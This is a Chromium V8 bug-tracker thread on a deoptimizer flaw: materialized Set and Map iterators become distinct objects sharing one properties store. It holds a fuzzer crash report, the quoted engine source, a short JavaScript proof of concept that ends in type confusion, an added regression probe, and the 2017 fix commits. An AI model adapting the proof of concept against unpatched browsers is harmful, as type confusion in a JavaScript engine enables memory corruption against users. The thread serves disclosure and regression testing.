Stack-overflow in v8::internal::TranslatedState::MaterializeAt
Issue description

Detailed report: https://clusterfuzz.com/testcase?key=5335701809004544

Fuzzer: ochang_js_fuzzer
Job Type: linux_asan_d8_dbg
Platform Id: linux

Crash Type: Stack-overflow
Crash Address: 0x7fff3ca706c0
Crash State:
  v8::internal::TranslatedState::MaterializeAt
  FieldAt
  v8::internal::TranslatedState::MaterializeCapturedObjectAt

Sanitizer: address (ASAN)

Regressed: https://clusterfuzz.com/revisions?job=linux_asan_d8_dbg&range=48562:48563

Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5335701809004544

Issue filed automatically.

See https://github.com/google/clusterfuzz-tools for more information.
Nov 21 2017
The stack trace does not look related to the suspected CL.
Nov 29 2017
Issue 789394 has been merged into this issue.
Nov 29 2017
titzer: Could you please help us find the right owner, if it's not you? Thanks!
lokihardt says, in 789394:
Here's a snippet of TranslatedState::MaterializeCapturedObjectAt.

```cpp
    case JS_SET_KEY_VALUE_ITERATOR_TYPE:
    case JS_SET_VALUE_ITERATOR_TYPE: {
      Handle<JSSetIterator> object = Handle<JSSetIterator>::cast(
          isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
      Handle<Object> properties = materializer.FieldAt(value_index);
      Handle<Object> elements = materializer.FieldAt(value_index);
      Handle<Object> table = materializer.FieldAt(value_index);
      Handle<Object> index = materializer.FieldAt(value_index);
      object->set_raw_properties_or_hash(*properties);
      object->set_elements(FixedArrayBase::cast(*elements));
      object->set_table(*table);
      object->set_index(*index);
      return object;
    }
    case JS_MAP_KEY_ITERATOR_TYPE:
    case JS_MAP_KEY_VALUE_ITERATOR_TYPE:
    case JS_MAP_VALUE_ITERATOR_TYPE: {
      Handle<JSMapIterator> object = Handle<JSMapIterator>::cast(
          isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
      Handle<Object> properties = materializer.FieldAt(value_index);
      Handle<Object> elements = materializer.FieldAt(value_index);
      Handle<Object> table = materializer.FieldAt(value_index);
      Handle<Object> index = materializer.FieldAt(value_index);
      object->set_raw_properties_or_hash(*properties);
      object->set_elements(FixedArrayBase::cast(*elements));
      object->set_table(*table);
      object->set_index(*index);
      return object;
    }
```

For these 5 types, it doesn't cache the created objects like "slot->value_ = object". This can be used to create different objects sharing the same properties, which may lead to type confusion.

PoC:

```javascript
function opt(b) {
  let iterator = new Set().values();
  iterator.x = 0;
  let arr = [iterator, iterator];
  if (b)
    return arr.slice();
}
for (let i = 0; i < 100000; i++)
  opt(false);
let res = opt(true);
let a = res[0];
let b = res[1];
print(a === b); // false
a.x = 7;
print(b.x); // 7
a.a = 1.1; // transition
b.b = 0x1234;
a.a = 1.1; // type confusion
```
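The identity check that lokihardt's PoC performs by hand, generalised to all five iterator kinds in the quoted switch, as an added regression probe. This is example code written for this page; it is not lokihardt's PoC, V8's fix, or the mjsunit test the fix added. It assumes the natural mapping from the five JS_*_ITERATOR_TYPE cases to Set.prototype.values/entries and Map.prototype.keys/values/entries, builds each probe with new Function so the five probes do not pool type feedback, and reuses the PoC's 100000-call warm-up as a heuristic to reach the optimizing tier instead of V8's --allow-natives-syntax. The names ITERATOR_SOURCES, makeProbe, probeIterator and probeAllIterators are the example's own. On a correct engine every kind reports sameIdentity=true; on a build with the bug the two references differ while a write through one is still visible through the other.

```javascript
// Added regression probe for the deoptimizer bug described above. Not code
// from the bug report or from V8. After deoptimization, an escape-analysed
// iterator that was referenced twice in the optimized frame must come back as
// ONE materialized object; a vulnerable build hands back two distinct objects
// that share a single properties backing store.
'use strict';

// The five iterator kinds named in the quoted switch, as the expressions that
// create them. The mapping to V8 instance types is this harness's assumption.
const ITERATOR_SOURCES = {
  'JS_SET_VALUE_ITERATOR_TYPE (Set.values)':       'new Set().values()',
  'JS_SET_KEY_VALUE_ITERATOR_TYPE (Set.entries)':  'new Set().entries()',
  'JS_MAP_KEY_ITERATOR_TYPE (Map.keys)':           'new Map().keys()',
  'JS_MAP_VALUE_ITERATOR_TYPE (Map.values)':       'new Map().values()',
  'JS_MAP_KEY_VALUE_ITERATOR_TYPE (Map.entries)':  'new Map().entries()',
};

// Build one probe per iterator kind from source text so each probe is its own
// function literal with its own type feedback; closures made from one shared
// literal would pool feedback across all five iterator maps. The body mirrors
// the PoC: the iterator escapes only via the cold branch, whose first use
// deoptimizes and forces materialization of the captured objects.
function makeProbe(iteratorExpr) {
  return new Function('b',
    `let iterator = ${iteratorExpr};
     iterator.x = 0;
     let arr = [iterator, iterator];
     if (b) return arr.slice();`);
}

// Warm the probe so the optimizing compiler picks it up (heuristic; V8's own
// tests would force tier-up with --allow-natives-syntax), then take the cold
// path once and inspect the two materialized references.
function probeIterator(iteratorExpr, warmup = 100000) {
  const probe = makeProbe(iteratorExpr);
  for (let i = 0; i < warmup; i++) probe(false);
  const [a, b] = probe(true);

  const sameIdentity = a === b;
  // A write through one reference is legitimately visible through the other
  // only because they are the same object. Distinct identities plus a shared
  // write is the symptom of two objects sitting on one properties store.
  a.x = 7;
  const writeVisibleViaOther = b.x === 7;

  return {
    sameIdentity,
    writeVisibleViaOther,
    sharedBackingStoreBug: !sameIdentity && writeVisibleViaOther,
  };
}

// Run the probe for every iterator kind; returns name -> result.
function probeAllIterators() {
  const results = {};
  for (const [name, expr] of Object.entries(ITERATOR_SOURCES)) {
    results[name] = probeIterator(expr);
  }
  return results;
}

// Human-readable report; returns 1 if any kind shows the bug, else 0.
function main() {
  const results = probeAllIterators();
  let buggy = false;
  for (const [name, r] of Object.entries(results)) {
    console.log(`${name}: sameIdentity=${r.sameIdentity} ` +
                `sharedBackingStoreBug=${r.sharedBackingStoreBug}`);
    buggy = buggy || r.sharedBackingStoreBug;
  }
  return buggy ? 1 : 0;
}

// Run under d8 (no require) or as the main script under node; stay quiet
// when imported as a module.
const isMain = typeof require === 'undefined' ||
               (typeof module !== 'undefined' && require.main === module);
if (isMain) {
  const code = main();
  if (typeof process !== 'undefined') process.exitCode = code;
}
```

Run it with node or d8. Whether the optimizing compiler actually compiles a probe within the warm-up is engine- and flag-dependent, so a clean result only says the deoptimized frame materialized correctly if the cold branch really did deoptimize; a sharedBackingStoreBug=true result, however, is always a real finding, since no correct engine can return two distinct objects for one captured reference.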
Nov 29 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=4927952109436928.
Nov 30 2017
Jaro is probably the right person to take a look at this one.
Dec 4 2017
The following revision refers to this bug:
https://chromium.googlesource.com/v8/v8.git/+/9a6f4422c6c194b6d02bea135ef478eba9b59da5

commit 9a6f4422c6c194b6d02bea135ef478eba9b59da5
Author: Jaroslav Sevcik <jarin@chromium.org>
Date: Mon Dec 04 17:57:45 2017

[deoptimizer] Fix materialization of iterators.

Bug: chromium:787301
Change-Id: If32310f9f2f3f04daa5bdaa9779302f4a012d397
Reviewed-on: https://chromium-review.googlesource.com/806223
Commit-Queue: Jaroslav Sevcik <jarin@chromium.org>
Reviewed-by: Benedikt Meurer <bmeurer@chromium.org>
Cr-Commit-Position: refs/heads/master@{#49843}

[modify] https://crrev.com/9a6f4422c6c194b6d02bea135ef478eba9b59da5/src/deoptimizer.cc
[add] https://crrev.com/9a6f4422c6c194b6d02bea135ef478eba9b59da5/test/mjsunit/compiler-regress-787301.js
Dec 5 2017
Dec 5 2017
ClusterFuzz has detected this issue as fixed in range 49842:49843.

Detailed report: https://clusterfuzz.com/testcase?key=5335701809004544

Fuzzer: ochang_js_fuzzer
Job Type: linux_asan_d8_dbg
Platform Id: linux

Crash Type: Stack-overflow
Crash Address: 0x7fff3ca706c0
Crash State:
  v8::internal::TranslatedState::MaterializeAt
  FieldAt
  v8::internal::TranslatedState::MaterializeCapturedObjectAt

Sanitizer: address (ASAN)

Regressed: https://clusterfuzz.com/revisions?job=linux_asan_d8_dbg&range=48562:48563
Fixed: https://clusterfuzz.com/revisions?job=linux_asan_d8_dbg&range=49842:49843

Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5335701809004544

See https://github.com/google/clusterfuzz-tools for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
Dec 5 2017
ClusterFuzz testcase 5335701809004544 is verified as fixed, so closing issue as verified. If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.
Dec 5 2017
Dec 14 2017
Dec 14 2017
This bug requires manual review: Request affecting a post-stable build
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop)
For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Dec 14 2017
+awhalley@ for merge review (FYI: At the moment there is no plan for M63 respin for Desktop)
Dec 14 2017
This bug requires manual review: M64 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop)
For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Dec 15 2017
Dec 15 2017
The following revision refers to this bug:
https://chromium.googlesource.com/v8/v8.git/+/a2b91edc56435a8829f7c9ddaf1ecaf558173cc0

commit a2b91edc56435a8829f7c9ddaf1ecaf558173cc0
Author: Jaroslav Sevcik <jarin@chromium.org>
Date: Fri Dec 15 10:00:30 2017

Merged: [deoptimizer] Fix materialization of iterators.

Revision: 9a6f4422c6c194b6d02bea135ef478eba9b59da5

BUG= chromium:787301
LOG=N
NOTRY=true
NOPRESUBMIT=true
NOTREECHECKS=true
R=bmeurer@chromium.org

Change-Id: I58698edad5431b87f15614afec8e133f2bc1f7d4
Reviewed-on: https://chromium-review.googlesource.com/828993
Reviewed-by: Benedikt Meurer <bmeurer@chromium.org>
Cr-Commit-Position: refs/branch-heads/6.4@{#14}
Cr-Branched-From: 0407506af3d9d7e2718be1d8759296165b218fcf-refs/heads/6.4.388@{#1}
Cr-Branched-From: a5fc4e085ee543cb608eb11034bc8f147ba388e1-refs/heads/master@{#49724}

[modify] https://crrev.com/a2b91edc56435a8829f7c9ddaf1ecaf558173cc0/src/deoptimizer.cc
[add] https://crrev.com/a2b91edc56435a8829f7c9ddaf1ecaf558173cc0/test/mjsunit/compiler-regress-787301.js
Jan 2 2018
Jan 2 2018
No new 63 push planned anyway.
Jan 22 2018
Feb 27 2018
Mar 2 2018
Mar 13 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Mar 27 2018
Comment 1 by ClusterFuzz, Nov 21 2017
Owner: eholk@chromium.org
Status: Assigned (was: Untriaged)